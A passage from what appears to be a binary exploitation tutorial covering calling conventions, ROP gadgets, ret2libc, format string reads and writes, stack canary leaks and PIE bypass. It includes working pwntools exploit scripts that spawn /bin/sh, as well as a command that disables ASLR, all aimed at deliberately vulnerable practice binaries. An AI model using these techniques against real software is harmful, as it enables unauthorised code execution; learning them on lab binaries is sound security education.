The real difference between the two, however, is the way you pass parameters to functions (which we'll be looking at much closer soon); in 32-bit, all parameters are pushed to the stack before the function is called. In 64-bit, however, the first 6 are stored in the registers RDI, RSI, RDX, RCX, R8, and R9 respectively as per the calling convention. Note that different Operating Systems also have different calling conventions.

Binary Exploitation - Stack

https://ir0nstone.gitbook.io/notes/

No eXecute

The defense against shellcode

As you can expect, programmers were hardly pleased that people could inject their own instructions into the program. The NX bit, which stands for No eXecute, defines areas of memory as either instructions or data. This means that your input will be stored as data, and any attempt to run it as instructions will crash the program, effectively neutralizing the shellcode.

To get around NX, exploit developers have to leverage a technique called ROP, Return-Oriented Programming.

The Windows version of NX is DEP, which stands for Data Execution Prevention

Checking for NX

You can either use pwntools' checksec or rabin2.

$ checksec vuln
[*] 'vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

$ rabin2 -I vuln
[...]
nx       false
[...]

Return-Oriented Programming

Bypassing NX

The basis of ROP is chaining together small chunks of code already present within the binary itself in such a way as to do what you wish. This often involves passing parameters to functions already present within libc, such as system - if you can find the location of a command, such as cat flag.txt, and then pass it as a parameter to the system, it will execute that command and return the output. A more dangerous command is /bin/sh, which when run by the system gives the attacker a shell much like the shellcode we used did.

Doing this, however, is not as simple as it may seem at first. To be able to properly call functions, we first have to understand how to pass parameters to them.

Calling Conventions

A more in-depth look into parameters for 32-bit and 64-bit programs

One Parameter

calling-conventions-one-param

Source

Let's have a quick look at the source:

#include <stdio.h>

void vuln(int check) {
    if(check == 0xdeadbeef) {
        puts("Nice!");
    } else {
        puts("Not nice!");
    }
}

int main() {
    vuln(0xdeadbeef);
    vuln(0xdeadc0de);
}

Pretty simple.

If we run the 32-bit and 64-bit versions, we get the same output:

Nice!
Not nice!

Just what we expected.

Analyzing 32-bit

Let's open the binary up in radare2 and disassemble it.

$ r2 -d -A vuln-32
$ s main; pdf

0x080491ac      8d4c2404       lea ecx, [argv]
0x080491b0      83e4f0         and esp, 0xfffffff0
0x080491b3      ff71fc         push dword [ecx - 4]
0x080491b6      55             push ebp
0x080491b7      89e5           mov ebp, esp
0x080491b9      51             push ecx
0x080491ba      83ec04         sub esp, 4
0x080491bd      e832000000     call sym.__x86.get_pc_thunk.ax
0x080491c2      053e2e0000     add eax, 0x2e3e
0x080491c7      83ec0c         sub esp, 0xc
0x080491ca      68efbeadde     push 0xdeadbeef
0x080491cf      e88effffff     call sym.vuln
0x080491d4      83c410         add esp, 0x10
0x080491d7      83ec0c         sub esp, 0xc
0x080491da      68dec0adde     push 0xdeadc0de
0x080491df      e87effffff     call sym.vuln
0x080491e4      83c410         add esp, 0x10
0x080491e7      b800000000     mov eax, 0
0x080491ec      8b4dfc         mov ecx, dword [var_4h]
0x080491ef      c9             leave
0x080491f0      8d61fc         lea esp, [ecx - 4]
0x080491f3      c3             ret

If we look closely at the calls to sym.vuln, we see a pattern:

push 0xdeadbeef
call sym.vuln
[...]
push 0xdeadc0de
call sym.vuln

We literally push the parameter to the stack before calling the function. Let's break on sym.vuln.

[0x080491ac]> db sym.vuln
[0x080491ac]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffdeb54c      0x080491d4 0xdeadbeef 0xffdeb624 0xffdeb62c

The first value there is the return pointer that we talked about before - the second, however, is the parameter. This makes sense because the return pointer gets pushed during the call, so it should be at the top of the stack. Now let's disassemble sym.vuln.

┌ 74: sym.vuln (int32_t arg_8h);
│           ; var int32_t var_4h @ ebp-0x4
│           ; arg int32_t arg_8h @ ebp+0x8
│           0x08049162 b    55             push ebp
│           0x08049163      89e5           mov ebp, esp
│           0x08049165      53             push ebx
│           0x08049166      83ec04         sub esp, 4
│           0x08049169      e886000000     call sym.__x86.get_pc_thunk.ax
│           0x0804916e      05922e0000     add eax, 0x2e92
│           0x08049173      817d08efbead.  cmp dword [arg_8h], 0xdeadbeef
│       ┌─< 0x0804917a      7516           jne 0x8049192
│       │   0x0804917c      83ec0c         sub esp, 0xc
│       │   0x0804917f      8d9008e0ffff   lea edx, [eax - 0x1ff8]
│       │   0x08049185      52             push edx
│       │   0x08049186      89c3           mov ebx, eax
│       │   0x08049188      e8a3feffff     call sym.imp.puts           ; int puts(const char *s)
│       │   0x0804918d      83c410         add esp, 0x10
│      ┌──< 0x08049190      eb14           jmp 0x80491a6
│      │└─> 0x08049192      83ec0c         sub esp, 0xc
│      │    0x08049195      8d900ee0ffff   lea edx, [eax - 0x1ff2]
│      │    0x0804919b      52             push edx
│      │    0x0804919c      89c3           mov ebx, eax
│      │    0x0804919e      e88dfeffff     call sym.imp.puts           ; int puts(const char *s)
│      │    0x080491a3      83c410         add esp, 0x10
│      │    ; CODE XREF from sym.vuln @ 0x8049190
│      └──> 0x080491a6      90             nop
│           0x080491a7      8b5dfc         mov ebx, dword [var_4h]
│           0x080491aa      c9             leave
└           0x080491ab      c3             ret

Here I'm showing the full output of the command because a lot of it is relevant. radare2 does a great job of detecting local variables - as you can see at the top, there is one called arg_8h. Later this same one is compared to 0xdeadbeef:

cmp dword [arg_8h], 0xdeadbeef

Clearly, that's our parameter.

So now we know, when there's one parameter, it gets pushed to the stack so that the stack looks like this:

return address        param_1

Analyzing 64-bit

Let's disassemble the main again here.

0x00401153      55             push rbp
0x00401154      4889e5         mov rbp, rsp
0x00401157      bfefbeadde     mov edi, 0xdeadbeef
0x0040115c      e8c1ffffff     call sym.vuln
0x00401161      bfdec0adde     mov edi, 0xdeadc0de
0x00401166      e8b7ffffff     call sym.vuln
0x0040116b      b800000000     mov eax, 0
0x00401170      5d             pop rbp
0x00401171      c3             ret

Hohoho, it's different. As we mentioned before, the parameter gets moved to rdi (in the disassembly here it's edi, but edi is just the lower 32 bits of rdi, and the parameter is only 32 bits long, so it says EDI instead). If we break on sym.vuln again we can check rdi with the command

dr rdi

Just dr will display all registers

[0x00401153]> db sym.vuln 
[0x00401153]> dc
hit breakpoint at: 401122
[0x00401122]> dr rdi
0xdeadbeef

Awesome.

Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address

Multiple Parameters

calling-convention-multi-param

Source

#include <stdio.h>

void vuln(int check, int check2, int check3) {
    if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
        puts("Nice!");
    } else {
        puts("Not nice!");
    }
}

int main() {
    vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
    vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}

32-bit

We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.

0x080491dd      680dd0dec0     push 0xc0ded00d
0x080491e2      68dec0adde     push 0xdeadc0de
0x080491e7      68efbeadde     push 0xdeadbeef
0x080491ec      e871ffffff     call sym.vuln
[...]
0x080491f7      6810efcdab     push 0xabcdef10
0x080491fc      6878563412     push 0x12345678
0x08049201      68dec0adde     push 0xdeadc0de
0x08049206      e857ffffff     call sym.vuln

It's just as simple - push them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln and print out the stack.

[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc      0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d

So it becomes quite clear how more parameters are placed on the stack:

return pointer        param1        param2        param3        [...]        paramN

64-bit

0x00401170      ba0dd0dec0     mov edx, 0xc0ded00d
0x00401175      bedec0adde     mov esi, 0xdeadc0de
0x0040117a      bfefbeadde     mov edi, 0xdeadbeef
0x0040117f      e89effffff     call sym.vuln
0x00401184      ba10efcdab     mov edx, 0xabcdef10
0x00401189      be78563412     mov esi, 0x12345678
0x0040118e      bfdec0adde     mov edi, 0xdeadc0de
0x00401193      e88affffff     call sym.vuln

So as well as rdi, we also push to rdx and rsi (or, in this case, their lower 32 bits).

Bigger 64-bit values

Just to show that it is in fact ultimately rdi and not edi that is used, I will alter the original one-parameter code to utilize a bigger number:

#include <stdio.h>

void vuln(long check) {
    if(check == 0xdeadbeefc0dedd00d) {
        puts("Nice!");
    }
}

int main() {
    vuln(0xdeadbeefc0dedd00d);
}

If you disassemble the main, you can see it disassembles to

movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln

movabs can be used to encode the mov instruction for 64-bit instructions - treat it as if it's a mov.

Gadgets

Controlling execution with snippets of code

Gadgets are small snippets of code followed by a ret instruction, e.g. pop rdi; ret. We can manipulate the ret of these gadgets in such a way as to string together a large chain of them to do what we want.

Example

Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret gadget.

What happens is fairly obvious - 0x10 gets popped into rdi as it is at the top of the stack during the pop rdi. Once the pop occurs, rsp moves:

And since ret is equivalent to pop rip, 0x5655576724 gets moved into rip. Note how the stack is laid out for this.

Utilizing Gadgets

When we overwrite the return pointer, we overwrite the value pointed at by rsp. Once that value is popped, it points to the next value at the stack - but wait. We can overwrite the next value in the stack.

Let's say that we want to exploit a binary to jump to a pop rdi; ret gadget, pop 0x100 into rdi then jump to flag(). Let's step-by-step the execution.

On the original ret, which we overwrite the return pointer for, we pop the gadget address in. Now rip moves to point to the gadget, and rsp moves to the next memory address.

rsp moves to the 0x100; rip to the pop rdi. Now when we pop, 0x100 gets moved into rdi.

RSP moves to the next item on the stack, the address of the flag(). The ret is executed and flag() is called.

Summary

Essentially, if the gadget pops values from the stack, simply place those values afterward (including the pop rip in ret). If we want to pop 0x10 into rdi and then jump to 0x16, our payload would look like this:

Note if you have multiple pop instructions, you can just add more values.

We use rdi as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.

Finding Gadgets

We can use the tool ROPgadget to find possible gadgets.

$ ROPgadget --binary vuln-64

Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]

Combine it with grep to look for specific registers.

$ ROPgadget --binary vuln-64 | grep rdi

0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret

Exploiting Calling Conventions

Utilizing Calling Conventions

exploiting_with_params

32-bit

The program expects the stack to be laid out like this before executing the function:

So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.

Everything after the address of flag() will be part of the stack frame for the next function as it is expected to be there - just instead of using push instructions we just overwrote them manually.

from pwn import *

p = process('./vuln-32')

payload = b'A' * 52            # Padding up to EIP
payload += p32(0x080491c7)     # Address of flag()
payload += p32(0x0)            # Return address - don't care if crashes when done
payload += p32(0xdeadc0de)     # First parameter
payload += p32(0xc0ded00d)     # Second parameter

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())

64-bit

Same logic, except we have to utilize the gadgets we talked about previously to fill the required registers (in this case rdi and rsi as we have two parameters).

We have to fill the registers before the function is called

from pwn import *

p = process('./vuln-64')

POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9


payload = b'A' * 56            # Padding
payload += p64(POP_RDI)        # pop rdi; ret
payload += p64(0xdeadc0de)     # value into rdi -> first param
payload += p64(POP_RSI_R15)    # pop rsi; pop r15; ret
payload += p64(0xc0ded00d)     # value into rsi -> first param
payload += p64(0x0)            # value into r15 -> not important
payload += p64(0x40116f)       # Address of flag()
payload += p64(0x0)

log.info(p.clean())
p.sendline(payload)
log.info(p.clean())

ret2libc

The standard ROP exploit

A ret2libc is based on the system function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh; if you pass this string to the system, it will pop a shell.

And that is the entire basis of it - passing /bin/sh as a parameter to the system. Doesn't sound too bad, right?

ret2libc

Disabling ASLR

To start with, we are going to disable ASLR. ASLR randomizes the location of libc in memory, meaning we cannot (without other steps) work out the location of the system and /bin/sh. To understand the general theory, we will start with it disabled.

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Manual Exploitation

Getting Libc and its base

Fortunately, Linux has a command called ldd for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.

$ ldd vuln-32 
	linux-gate.so.1 (0xf7fd2000)
	libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
	/lib/ld-linux.so.2 (0xf7fd3000)

We need libc.so.6, so the base address of libc is 0xf7dc2000.

Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.

Getting the location of the system()

To call the system, we obviously need its location in memory. We can use the readelf command for this.

$ readelf -s /lib32/libc.so.6 | grep system

1534: 00044f00    55 FUNC    WEAK   DEFAULT   14 system@@GLIBC_2.0

The -s flag tells readelf to search for symbols, for example, functions. Here we can find the offset of the system from the libc base is 0x44f00.

Getting the location of /bin/sh

Since /bin/sh is just a string, we can use strings on the dynamic library we just found with ldd. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.

$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh

-a tells it to scan the entire file; -t x tells it to output the offset in hex.

32-bit Exploit

from pwn import *

p = process('./vuln-32')

libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

64-bit Exploit

Repeat the process with the libc linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6).

Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret gadget to put it into the RDI register.

$ ROPgadget --binary vuln-64 | grep rdi

[...]
0x00000000004011cb : pop rdi ; ret

from pwn import *

p = process('./vuln-64')

libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143

POP_RDI = 0x4011cb

payload = b'A' * 72         # The padding
payload += p64(POP_RDI)     # gadget -> pop rdi; ret
payload += p64(binsh)       # pointer to command: /bin/sh
payload += p64(system)      # Location of system
payload += p64(0x0)         # return pointer - not important once we get the shell

p.clean()
p.sendline(payload)
p.interactive()

Automating with Pwntools

Unsurprisingly, pwntools has a bunch of features that make this much simpler.

# 32-bit
from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

libc = elf.libc                        # Simply grab the libc it's running with
libc.address = 0xf7dc2000              # Set base address

system = libc.sym['system']            # Grab location of system
binsh = next(libc.search(b'/bin/sh'))  # grab string location

payload = b'A' * 76         # The padding
payload += p32(system)      # Location of system
payload += p32(0x0)         # return pointer - not important once we get the shell
payload += p32(binsh)       # pointer to command: /bin/sh

p.clean()
p.sendline(payload)
p.interactive()

The 64-bit looks essentially the same.

Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.

Format String Bug

Reading memory off the stack

Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.

Why it exists

In C, certain functions can take "format specifier" within strings. Let's look at an example:

int value = 1205;

printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);

This prints out:

Decimal: 1205
Float: 1205.000000
Hex: 0x4b5

So, it replaced %d with the value, %f with the float value and %x with the hex representation.

This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:

int value = 1205;

printf("%x %x %x", value, value, value);

As expected, we get

4b5 4b5 4b5

What happens, however, if we don't have enough arguments for all the format specifiers?

int value = 1205;

printf("%x %x %x", value);

4b5 5659b000 565981b0

Erm... what happened here?

The key here is that printf expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.

How to abuse this

Surely if it's a bug in the code, the attacker can't do much, right? Well, the real issue is when C code takes user-provided input and prints it out using printf.

fmtstr_arb_read

#include <stdio.h>

int main(void) {
    char buffer[30];
    
    gets(buffer);

    printf(buffer);
    return 0;
}

If we run this normally, it works as expected:

$ ./test 

yes
yes

But what happens if we input a format string specifier, such as %x?

$ ./test

%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520

It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.

Choosing Offsets

To print the same value 3 times, using

printf("%x %x %x", value, value, value);

Gets tedious - so, there is a better way in C.

printf("%1$x %1$x %1$x", value);

The 1$ between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p - instead of sending %p %p %p %p %p %p, we can just do %6$p. This allows us to be much more efficient.

Arbitrary Reads

In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value of the stack, you read the value in the memory address it points at.

Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.

Let's look back at the previous program and its output:

$ ./test

%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825

You may notice that the last two values contain the hex values of %x . That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address and then point %s at it, we can get an arbitrary write!

$ ./vuln 

ABCD|%6$p
ABCD|0x44434241

%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which makes it stand out more

As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the location of the ELF file and reads it with %s - if all goes well, it should read the first bytes of the file, which is always \x7fELF. Start with the basics:

from pwn import *

p = process('./vuln')

payload = p32(0x41424344)
payload += b'|%6$p'

p.sendline(payload)
log.info(p.clean())

$ python3 exploit.py

[+] Starting local process './vuln': pid 3204
[*] b'DCBA|0x41424344'

Nice it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:

from pwn import *

p = process('./vuln')

payload = p32(0x8048000)
payload += b'|%6$s'

p.sendline(payload)
log.info(p.clean())

It doesn't work.

The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.

from pwn import *

p = process('./vuln')

payload = b'%8$p||||'
payload += p32(0x8048000)

p.sendline(payload)
log.info(p.clean())

Let's break down the payload:

We add 4 | because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.

$ python3 exploit.py

[+] Starting local process './vuln': pid 3255
[*] b'0x8048000||||'

It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.

Now let's replace the p with an s.

$ python3 exploit.py

[+] Starting local process './vuln': pid 3326
[*] b'\x7fELF\x01\x01\x01||||'

Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte is \x7fELF\x01\x01\x01.

Arbitrary Writes

Luckily C contains a rarely-used format specifier %n. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write them.

Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.

fmtstr_arb_write

#include <stdio.h>

int auth = 0;

int main() {
    char password[100];

    puts("Password: ");
    fgets(password, sizeof password, stdin);
    
    printf(password);
    printf("Auth is %i\n", auth);

    if(auth == 10) {
        puts("Authenticated!");
    }
}

Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.

Work out the location of auth

As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.

$ readelf -s auth | grep auth
    34: 00000000     0 FILE    LOCAL  DEFAULT  ABS auth.c
    57: 0804c028     4 OBJECT  GLOBAL DEFAULT   24 auth

The location of auth is 0x0804c028.

Writing the Exploit

We're lucky there are no null bytes, so there's no need to change the order.

$ ./auth 

Password: 
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20702520

Buffer is the 7th %p.

from pwn import *

AUTH = 0x804c028

p = process('./auth')

payload = p32(AUTH)
payload += b'|' * 6         # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'


print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))

And easy peasy:

[+] Starting local process './auth': pid 4045
Password: 

[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!

Pwntools

As you can expect, pwntools has a handy feature for automating %n format string exploits:

payload = fmtstr_payload(offset, {location : value})

The offset in this case is 7 because the 7th %p read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.

payload = fmtstr_payload(7, {AUTH : 10})

You can also grab the location of the auth symbol with pwntools:

elf = ELF('./auth')
AUTH = elf.sym['auth']

Check out the pwntools tutorials for more cool features

Binary Exploitation - Stack

https://ir0nstone.gitbook.io/notes/

Stack Canaries

The Buffer Overflow defense

Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.

If they are not, the attacker attempted to overflow to control the return pointer, and the program crashes, often with a ***stack smashing detected*** error message.

On Linux, stack canaries end in 00. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.

Bypassing Canaries

There are two ways to bypass a canary.

Leaking it

This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.

Source

#include <stdio.h>

void vuln() {
    char buffer[64];

    puts("Leak me");
    gets(buffer);

    printf(buffer);
    puts("");

    puts("Overflow me");
    gets(buffer);
}

int main() {
    vuln();
}

void win() {
    puts("You won!");
}

The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win().

32-bit

canary-32

First, let's check if there is a canary:

$ pwn checksec vuln-32 
[*] 'vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Yup, there is. Now we need to calculate at what offset the canary is at and to do this we'll use radare2.

$ r2 -d -A vuln-32

[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60  0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e  |...............
0xffd7cd70  0x08048034 0x00000000 0xf7f57000 0x00007025  4........p..%p..
0xffd7cd80  0x00000000 0x00000000 0x08048034 0xf7f02a28  ........4...(*..
0xffd7cd90  0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade  .............:..
0xffd7cda0  0xf7f013fc 0xffffffff 0x00000000 0x080492cb  ................
0xffd7cdb0  0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00  ................

The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00 and looks very random, unlike the libc and stack addresses that start with f7 and ff. If we count the number of addresses it's around 24 until that value, so we go one before and one after as well to make sure.

$./vuln-32

Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)

It appears to be at %23$p. Remember, stack canaries are randomized for each new process, so it won't be the same.

Now let's just automate grabbing the canary with pwntools:

from pwn import *

p = process('./vuln-32')

log.info(p.clean())
p.sendline('%23$p')

canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')

$ python3 exploit.py 
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300

Now all that's left is to work out what the offset is until the canary, and then the offset from after the canary to the return pointer.

$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0  0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00

We see the canary is at 0xffea8afc. A little later on the return pointer (we assume) is at 0xffea8b0c. Let's break just after the next gets() and check what value we overwrite it with (we'll use a De Bruijn pattern).

[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc  0x41574141 0x41415841 0x5a414159 0x41614141  AAWAAXAAYAAZAAaA
0xffea8b0c  0x41416241 0x64414163 0x41654141 0x41416641  AbAAcAAdAAeAAfAA

Now we can check the canary and EIP offsets:

[0x0804920f]> wopO 0x41574141
64
[0x0804920f]> wopO 0x41416241
80

The returned pointer is 16 bytes after the canary start, so 12 bytes after the canary.

from pwn import *

p = process('./vuln-32')

log.info(p.clean())
p.sendline('%23$p')

canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')

payload = b'A' * 64
payload += p32(canary)  # overwrite canary with original value to not trigger
payload += b'A' * 12    # pad to return pointer
payload += p32(0x08049245)

p.clean()
p.sendline(payload)

print(p.clean().decode('latin-1'))

64-bit

Same source, same approach, just 64-bit. Try it yourself before checking the solution.

Remember, in 64-bit format string goes to the relevant registers first and the addresses can fit 8 bytes each so the offset may be different.

canary-64

Bruteforcing the Canary

This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.

As you can expect, the general idea is to run the process loads and load of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{ and this can take ages to run and is frankly not a particularly interesting challenge.

PIE

Position Independent Code

Overview

PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.

Analysis

Luckily, this does not mean it's impossible to exploit. PIE executables are based on relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main is located 0x128 bytes in memory after the base address of the binary, and you somehow find the location of main, you can simply subtract 0x128 from this to get the base address and from the addresses of everything else.

Exploitation

So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?

The stack of course!

We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value of the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!

Double-Checking

Due to the way PIE randomization works, the base address of a PIE executable will always end in the hexadecimal characters 000. This is because pages are the things being randomized in memory, which have a standard size of 0x1000. Operating Systems keep track of page tables that point to each section of memory and define the permissions for each section, similar to segmentation.

Checking the base address ends in 000 should probably be the first thing you do if your exploit is not working as you expected.

Pwntools, PIE, and ROP

As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf or other command line tools, but instead can receive it all dynamically.

Not to mention that the ROP capabilities are incredibly powerful as well.

PIE Bypass with Given Leak

Exploiting PIE with a given leak

The Source

pie-32

#include <stdio.h>

int main() {
    vuln();

    return 0;
}

void vuln() {
    char buffer[20];

    printf("Main Function is at: %lx\n", main);

    gets(buffer);
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Pretty simple - we print the address of the main, which we can read and calculate the base address from. Then, using this, we can calculate the address of win() itself.

Analysis

Let's just run the script to make sure it's the right one :D

$ ./vuln-32 
Main Function is at: 0x5655d1b9

Yup, and as we expected, it prints the location of the main.

Exploitation

First, let's set up the script. We create an ELF object, which becomes very useful later on, and start the process.

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

Now we want to take in the main function location. To do this we can simply receive up until it (and do nothing with that) and then read it.

p.recvuntil('at: ')
main = int(p.recvline(), 16)

Since we received the entire line except for the address, only the address will come up with p.recvline().

Now we'll use the ELF object we created earlier and set its base address. The sym dictionary returns the offsets of the functions from the binary base until the base address is set, after which it returns the absolute address in memory.

elf.address = main - elf.sym['main']

In this case, elf.sym['main'] will return 0x11b9; if we ran it again, it would return 0x11b9 + the base address. So, essentially, we're subtracting the offset of the main from the address we leaked to get the base of the binary.

Now we know the base we can just call win().

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.sendline(payload)

print(p.clean().decode('latin-1'))

By this point, I assume you know how to find the padding length and other stuff we've been mentioning for a while, so I won't be showing you every step of that.

And does it work?

[*] 'vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D

Awesome!

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

p.recvuntil('at: ')
main = int(p.recvline(), 16)

elf.address = main - elf.sym['main']

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.sendline(payload)

print(p.clean().decode('latin-1'))

Summary

From the leaked address of the main, we were able to calculate the base address of the binary. From this, we could then calculate the address of the win and call it.

And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.

64-bit

Try this for yourself first, then feel free to check the solution. Same source, same challenge.

pie-64

PIE Bypass

Using format string

The Source

pie-fmtstr

#include <stdio.h>

void vuln() {
    char buffer[20];

    printf("What's your name?\n");
    gets(buffer);
    
    printf("Nice to meet you ");
    printf(buffer);
    printf("\n");

    puts("What's your message?");

    gets(buffer);
}

int main() {
    vuln();

